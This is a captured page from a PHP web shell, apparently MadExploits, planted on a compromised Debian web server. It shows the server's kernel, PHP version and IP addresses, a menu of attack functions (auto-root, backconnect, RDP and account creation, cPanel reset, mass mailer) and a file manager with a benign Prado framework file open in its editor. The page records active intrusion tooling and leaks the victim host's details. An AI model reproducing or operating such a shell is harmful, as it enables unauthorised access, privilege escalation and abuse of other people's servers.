Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.119.135.231
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Web /
Javascripts /
[ HOME SHELL ]
Name
Size
Permission
Action
source
[ DIR ]
drwxr-xr-x
TJavaScript.php
7.72
KB
-rw-r--r--
TJavaScriptAsset.php
1.22
KB
-rw-r--r--
TJavaScriptLiteral.php
1.34
KB
-rw-r--r--
TJavaScriptString.php
738
B
-rw-r--r--
css-packages.php
2.66
KB
-rw-r--r--
packages.php
2.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TJavaScriptLiteral.php
<?php /** * TComponent, TPropertyValue classes * * @author Qiang Xue <qiang.xue@gmail.com> * * Global Events, intra-object events, Class behaviors, expanded behaviors * @author Brad Anderson <javalizard@mac.com> * * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Web\Javascripts; /** * TJavaScriptLiteral class that encloses string literals that are not * supposed to be escaped by {@link TJavaScript::encode() } * * Since Prado 3.2 all the data that gets sent clientside inside a javascript statement * is encoded by default to avoid any kind of injection. * Sometimes there's the need to bypass this encoding and send raw javascript code. * To ensure that a string doesn't get encoded by {@link TJavaScript::encode() }, * construct a new TJavaScriptLiteral: * <code> * // a javascript test string * $js="alert('hello')"; * // the string in $raw will not be encoded when sent clientside inside a javascript block * $raw=new TJavaScriptLiteral($js); * // shortened form * $raw=_js($js); * </code> * * @since 3.2.0 */ class TJavaScriptLiteral { protected $_s; public function __construct($s) { $this->_s = $s; } public function __toString() { return (string) $this->_s; } public function toJavaScriptLiteral() { return $this->__toString(); } }
Close